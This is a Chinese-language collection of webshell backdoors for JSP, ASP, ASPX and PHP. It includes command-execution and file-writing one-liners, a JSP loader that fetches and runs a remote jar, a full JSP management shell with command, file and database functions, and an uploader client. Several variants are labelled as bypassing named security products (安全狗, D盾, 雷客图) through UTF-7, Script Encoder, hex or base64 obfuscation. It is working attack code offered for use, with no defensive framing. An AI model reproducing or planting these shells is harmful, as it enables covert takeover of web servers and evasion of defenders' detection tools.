JSP:
无回显(http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls)
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
有回显 (http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls)
1 <% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print(" 2 <pre>"); 3 while((a=in.read(b))!=-1){ 4 out.println(new String(b,0,a)); 5 } 6 out.print("</pre> 7 "); 8 } 9 %>
客户端写入:
http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
1 <%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>
http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
1 <%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes());%>
http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
1 <%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
1 <%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
反射调用外部jar:
http://192.168.16.240:8080/Shell/reflect.jsp?u=http://javaweb.org/Cat.jar&023=A
1 <%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u"))})).getMethods()[0].invoke(null, new Object[]{request.getParameterMap()})%>
常规:
1 <% 2 if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); 3 %>
1 <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> 2 <%!String Pwd = "pass"; 3 4 String EC(String s, String c) throws Exception { 5 return s; 6 }//new String(s.getBytes("ISO-8859-1"),c);} 7 8 Connection GC(String s) throws Exception { 9 String[] x = s.trim().split(" "); 10 Class.forName(x[0].trim()).newInstance(); 11 Connection c = DriverManager.getConnection(x[1].trim()); 12 if (x.length > 2) { 13 c.setCatalog(x[2].trim()); 14 } 15 return c; 16 } 17 18 void AA(StringBuffer sb) throws Exception { 19 File r[] = File.listRoots(); 20 for (int i = 0; i < r.length; i++) { 21 sb.append(r[i].toString().substring(0, 2)); 22 } 23 } 24 25 void BB(String s, StringBuffer sb) throws Exception { 26 File oF = new File(s), l[] = oF.listFiles(); 27 String sT, sQ, sF = ""; 28 java.util.Date dt; 29 SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); 30 for (int i = 0; i < l.length; i++) { 31 dt = new java.util.Date(l[i].lastModified()); 32 sT = fm.format(dt); 33 sQ = l[i].canRead() ? "R" : ""; 34 sQ += l[i].canWrite() ? " W" : ""; 35 if (l[i].isDirectory()) { 36 sb.append(l[i].getName() + "/ " + sT + " " + l[i].length() 37 + " " + sQ + " "); 38 } else { 39 sF += l[i].getName() + " " + sT + " " + l[i].length() + " " 40 + sQ + " "; 41 } 42 } 43 sb.append(sF); 44 } 45 46 void EE(String s) throws Exception { 47 File f = new File(s); 48 if (f.isDirectory()) { 49 File x[] = f.listFiles(); 50 for (int k = 0; k < x.length; k++) { 51 if (!x[k].delete()) { 52 EE(x[k].getPath()); 53 } 54 } 55 } 56 f.delete(); 57 } 58 59 void FF(String s, HttpServletResponse r) throws Exception { 60 int n; 61 byte[] b = new byte[512]; 62 r.reset(); 63 ServletOutputStream os = r.getOutputStream(); 64 BufferedInputStream is = new BufferedInputStream(new FileInputStream(s)); 65 os.write(("->" + "|").getBytes(), 0, 3); 66 while ((n = is.read(b, 0, 512)) != -1) { 67 os.write(b, 0, n); 68 } 69 os.write(("|" + "<-").getBytes(), 0, 3); 70 os.close(); 71 is.close(); 72 } 73 74 void GG(String s, String d) throws Exception { 75 String h = "0123456789ABCDEF"; 76 int n; 77 File f = new File(s); 78 f.createNewFile(); 79 FileOutputStream os = new FileOutputStream(f); 80 for (int i = 0; i < d.length(); i += 2) { 81 os 82 .write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d 83 .charAt(i + 1)))); 84 } 85 os.close(); 86 } 87 88 void HH(String s, String d) throws Exception { 89 File sf = new File(s), df = new File(d); 90 if (sf.isDirectory()) { 91 if (!df.exists()) { 92 df.mkdir(); 93 } 94 File z[] = sf.listFiles(); 95 for (int j = 0; j < z.length; j++) { 96 HH(s + "/" + z[j].getName(), d + "/" + z[j].getName()); 97 } 98 } else { 99 FileInputStream is = new FileInputStream(sf); 100 FileOutputStream os = new FileOutputStream(df); 101 int n; 102 byte[] b = new byte[512]; 103 while ((n = is.read(b, 0, 512)) != -1) { 104 os.write(b, 0, n); 105 } 106 is.close(); 107 os.close(); 108 } 109 } 110 111 void II(String s, String d) throws Exception { 112 File sf = new File(s), df = new File(d); 113 sf.renameTo(df); 114 } 115 116 void JJ(String s) throws Exception { 117 File f = new File(s); 118 f.mkdir(); 119 } 120 121 void KK(String s, String t) throws Exception { 122 File f = new File(s); 123 SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); 124 java.util.Date dt = fm.parse(t); 125 f.setLastModified(dt.getTime()); 126 } 127 128 void LL(String s, String d) throws Exception { 129 URL u = new URL(s); 130 int n; 131 FileOutputStream os = new FileOutputStream(d); 132 HttpURLConnection h = (HttpURLConnection) u.openConnection(); 133 InputStream is = h.getInputStream(); 134 byte[] b = new byte[512]; 135 while ((n = is.read(b, 0, 512)) != -1) { 136 os.write(b, 0, n); 137 } 138 os.close(); 139 is.close(); 140 h.disconnect(); 141 } 142 143 void MM(InputStream is, StringBuffer sb) throws Exception { 144 String l; 145 BufferedReader br = new BufferedReader(new InputStreamReader(is)); 146 while ((l = br.readLine()) != null) { 147 sb.append(l + " "); 148 } 149 } 150 151 void NN(String s, StringBuffer sb) throws Exception { 152 Connection c = GC(s); 153 ResultSet r = c.getMetaData().getCatalogs(); 154 while (r.next()) { 155 sb.append(r.getString(1) + " "); 156 } 157 r.close(); 158 c.close(); 159 } 160 161 void OO(String s, StringBuffer sb) throws Exception { 162 Connection c = GC(s); 163 String[] t = { "TABLE" }; 164 ResultSet r = c.getMetaData().getTables(null, null, "%", t); 165 while (r.next()) { 166 sb.append(r.getString("TABLE_NAME") + " "); 167 } 168 r.close(); 169 c.close(); 170 } 171 172 void PP(String s, StringBuffer sb) throws Exception { 173 String[] x = s.trim().split(" "); 174 Connection c = GC(s); 175 Statement m = c.createStatement(1005, 1007); 176 ResultSet r = m.executeQuery("select * from " + x[3]); 177 ResultSetMetaData d = r.getMetaData(); 178 for (int i = 1; i <= d.getColumnCount(); i++) { 179 sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i) 180 + ") "); 181 } 182 r.close(); 183 m.close(); 184 c.close(); 185 } 186 187 void QQ(String cs, String s, String q, StringBuffer sb) throws Exception { 188 int i; 189 Connection c = GC(s); 190 Statement m = c.createStatement(1005, 1008); 191 try { 192 ResultSet r = m.executeQuery(q); 193 ResultSetMetaData d = r.getMetaData(); 194 int n = d.getColumnCount(); 195 for (i = 1; i <= n; i++) { 196 sb.append(d.getColumnName(i) + " | "); 197 } 198 sb.append(" "); 199 while (r.next()) { 200 for (i = 1; i <= n; i++) { 201 sb.append(EC(r.getString(i), cs) + " | "); 202 } 203 sb.append(" "); 204 } 205 r.close(); 206 } catch (Exception e) { 207 sb.append("Result | "); 208 try { 209 m.executeUpdate(q); 210 sb.append("Execute Successfully! | "); 211 } catch (Exception ee) { 212 sb.append(ee.toString() + " | "); 213 } 214 } 215 m.close(); 216 c.close(); 217 }%> 218 219 220 <% 221 String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z0") + ""; 222 request.setCharacterEncoding(cs); 223 response.setContentType("text/html;charset=" + cs); 224 String Z = EC(request.getParameter(Pwd) + "", cs); 225 String z1 = EC(request.getParameter("z1") + "", cs); 226 String z2 = EC(request.getParameter("z2") + "", cs); 227 StringBuffer sb = new StringBuffer(""); 228 try { 229 sb.append("->" + "|"); 230 if (Z.equals("A")) { 231 String s = new File(application.getRealPath(request 232 .getRequestURI())).getParent(); 233 sb.append(s + " "); 234 if (!s.substring(0, 1).equals("/")) { 235 AA(sb); 236 } 237 } else if (Z.equals("B")) { 238 BB(z1, sb); 239 } else if (Z.equals("C")) { 240 String l = ""; 241 BufferedReader br = new BufferedReader( 242 new InputStreamReader(new FileInputStream(new File( 243 z1)))); 244 while ((l = br.readLine()) != null) { 245 sb.append(l + " "); 246 } 247 br.close(); 248 } else if (Z.equals("D")) { 249 BufferedWriter bw = new BufferedWriter( 250 new OutputStreamWriter(new FileOutputStream( 251 new File(z1)))); 252 bw.write(z2); 253 bw.close(); 254 sb.append("1"); 255 } else if (Z.equals("E")) { 256 EE(z1); 257 sb.append("1"); 258 } else if (Z.equals("F")) { 259 FF(z1, response); 260 } else if (Z.equals("G")) { 261 GG(z1, z2); 262 sb.append("1"); 263 } else if (Z.equals("H")) { 264 HH(z1, z2); 265 sb.append("1"); 266 } else if (Z.equals("I")) { 267 II(z1, z2); 268 sb.append("1"); 269 } else if (Z.equals("J")) { 270 JJ(z1); 271 sb.append("1"); 272 } else if (Z.equals("K")) { 273 KK(z1, z2); 274 sb.append("1"); 275 } else if (Z.equals("L")) { 276 LL(z1, z2); 277 sb.append("1"); 278 } else if (Z.equals("M")) { 279 String[] c = { z1.substring(2), z1.substring(0, 2), z2 }; 280 Process p = Runtime.getRuntime().exec(c); 281 MM(p.getInputStream(), sb); 282 MM(p.getErrorStream(), sb); 283 } else if (Z.equals("N")) { 284 NN(z1, sb); 285 } else if (Z.equals("O")) { 286 OO(z1, sb); 287 } else if (Z.equals("P")) { 288 PP(z1, sb); 289 } else if (Z.equals("Q")) { 290 QQ(cs, z1, z2, sb); 291 } 292 } catch (Exception e) { 293 sb.append("ERROR" + ":// " + e.toString()); 294 } 295 sb.append("|" + "<-"); 296 out.print(sb.toString()); 297 %>
JSP后门连接:
1 <html><head><title>JSP一句话木马客户端</title></head><div align=center> <font color=red>专用JSP木马连接器</font><br><form name=get method=post>服务端地址<input name=url size=110 type=text> <br><br><textarea name=t rows=20 cols=120>你提交的代码</textarea><br>保存成的文件名:<input name=f size=30 value=shell.jsp><input type=button onclick="javascript:get.action=document.get.url.value;get.submit()" value=提交> </form> <br>服务端代码:<br><textarea rows=5 cols=120><%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> </textarea> </div></body>
下载远程文件:
http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png
1 <% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream(); byte[] b = new byte[1024]; java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream(); int a = -1; while ((a = in.read(b)) != -1) { baos.write(b, 0, a); } new java.io.FileOutputStream(request.getParameter("f")).write(baos.toByteArray()); %>
下载web路径:
http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png
1 <% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream(); byte[] b = new byte[1024]; java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream(); int a = -1; while ((a = in.read(b)) != -1) { baos.write(b, 0, a); } new java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f")).write(baos.toByteArray()); %>
ASP:
<%eval request("chopper")%>
常规:
1 <%execute request("chopper")%> 2 3 <%execute(request("chopper"))%> 4 5 <%ExecuteGlobal request("chopper")%> 6 7 <%Eval(Request(chr(35)))%> 8 9 <%dy=request("c")%><%Eval(dy)%> 10 11 <%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%> 12 13 <% if Request("c")<>"" then ExecuteGlobal request("c") end if %> 14 15 <%execute request("c")%><%'<% loop <%:%> 16 17 < %'<% loop <%:%><%execute request("a")%> 18 19 <script language=vbs runat=server>eval(request("c"))</script> 20 21 <script language=VBScript runat=server>execute request("#")</script> 22 23 <%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("c"))%> 24 25 <%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%> 26 27 <%execute(unescape("eval%20request%28%22aaa%22%29"))%>
UTF-7编码加密:
1 <%@ codepage=65000%><% response.Charset=”936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>
Script Encoder 加密 //密码c
View Code
View Code
View Code
View Code
View Code
View Code
View Code
View Code
View Code
1 <%@ LANGUAGE = VBScript.Encode %> 2 <%#@~^PgAAAA==~b0~"+$E+kYvEmr#@!@*rJ~O4+x,36mEDn!VK4mV~Dn5!+dYvEmr#~n NPrW,SBMAAA==^#~@%>
过雷客图:
1 <%set ms = server.CreateObject("MSScriptControl.ScriptControl.1") 2 ms.Language="VBScript" 3 ms.AddObject "Response", Response 4 ms.AddObject "request", request 5 ms.AddObject "session", session 6 ms.AddObject "server", server 7 ms.AddObject "application", application 8 ms.ExecuteStatement ("ex"&"e"&"cute(request(chr(35)))")%> 9 10 <% 11 password=Request("class") 12 Execute(AACode("457865637574652870617373776F726429")):Function AACode(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute("AACode=AACode&chr(&H"&c&")"):Else:Execute("AACode=AACode&chr(&H"&c&Mid(s,i+2,2)&")"):i=i+2:End If:Next:End Function 13 %> 14 15 16 <% 17 password=Request("class") 18 Execute(DeAsc("%87%138%119%117%135%134%119%58%130%115%133%133%137%129%132%118%59")):Function DeAsc(Str):Str=Split(Str,"%"):For I=1 To Ubound(Str):DeAsc=DeAsc&Chr(Str(I)-18):Next:End Function 19 %>
ASPX:
常规免杀
1 <%@ Page Language="Jscript"%> 2 <% 3 var a = Request.Item["M"]; 4 var b = "un" + Char ( 115 ) + Char ( 97 ) + "fe";//主要就是这个地方 其他地方好像不会管 5 eval(a,b); 6 Response.Write("Test"); 7 %>
绕过安全狗
1 <% 2 dim play 3 ' 4 ' 5 '''''''''''''''''' 6 ''''''''' 7 play = request("#") 8 %> 9 Error 10 <% 11 execute(play) 12 %>
1 <%@codepage=65000%> 2 <%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("#")%>
过D盾:
1 <%@ Page Language="Jscript" Debug=true%> 2 <% 3 var a=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5Gb3JtWyJwYXNzIl0=")); 4 var b=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("dW5zYWZl")); 5 var c=eval(a,b); 6 eval(c,b); 7 8 %> 9 10 11 12 <%@ Page Language="Jscript" Debug=true%> 13 <% 14 var a=Request.Form["pass"]; 15 var b="unsa",c="fe",d=b+c; 16 function fun() 17 { 18 return a; 19 } 20 eval(fun(),d); 21 %>
PHP:
常规:
1 <?php 2 system($_GET['cmd']); 3 ?>
过D盾:
1 <?php 2 $ab = $_REQUEST['d']; 3 $a['t'] = ""; 4 eval($a['t'].$ab);
过安全狗
1 <?php 2 $a = $_REQUEST['d']; 3 $a = "$a"; 4 $b['test'] = ""; 5 eval($b['test']."$a");